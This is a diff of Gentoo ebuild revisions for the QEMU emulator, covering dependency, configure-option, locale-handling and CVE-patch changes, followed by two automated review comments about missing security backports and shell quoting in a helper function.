fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -205,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -288,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,21 +332,17 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4.0-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-7295-{1,2,3}.patch #560760
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-6855.patch #560422
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
# MIPS specific fixes. Bug #563162 epatch "${FILESDIR}"/${PN}-2.5.0-CVE-2016-2198.patch #573314
for x in "${FILESDIR}"/${PN}-2.4-mips-*; do epatch "${FILESDIR}"/${PN}-2.5.0-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${x}" epatch "${FILESDIR}"/${PN}-2.5.1-stellaris_enet-overflow.patch #579614
done epatch "${FILESDIR}"/${PN}-2.5.1-CVE-2016-4020.patch #580040
epatch "${FILESDIR}"/${PN}-2.5.1-CVE-2015-8558.patch #568246 #580426
epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -320,6 +351,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -344,6 +378,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -372,6 +411,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -387,16 +428,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -570,12 +611,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -629,10 +670,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {
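Review bot: The epatch list in the src_prepare hunk applies far fewer security fixes than the sibling ebuild in the preceding file section (CVE-2015-8567, CVE-2015-8701, CVE-2016-1714 and several others are absent), and nothing in the hunk says why. Presumably those fixes are already in this version's upstream tarball, but someone auditing the package against the listed bug numbers cannot tell that from the ebuild. I would add a comment above the list such as `# Security backports carried by the previous revision are in the upstream release.`, once that has been checked against the tarball. src_prepare spans several hunks, so its full body is not visible here.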


@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -34,7 +36,7 @@ kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
@ -123,7 +125,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
@ -134,6 +136,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -156,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -211,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -294,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -303,10 +332,7 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
@ -318,6 +344,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -342,6 +371,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -371,6 +405,7 @@ qemu_src_configure() {
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls) $(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -395,6 +430,7 @@ qemu_src_configure() {
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -627,10 +663,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {
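Review bot: In the new `handle_locales` helper (hunk `@ -294,6 +300,29`), `rm_loc` expands `$1` unquoted and is defined inside the function, but bash function definitions are global, so it stays defined in the ebuild environment after `handle_locales` returns. I would write it as `rm_loc() { rm "po/$1.po" || die; }` and add `unset -f rm_loc` after the `l10n_for_each_disabled_locale_do rm_loc` call. The filters `grep -v messages.po` and `sed 's:.po$::'` also leave the dot unescaped, so it matches any character; `grep -vx 'messages\.po'` and `sed 's:\.po$::'` state what is meant.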
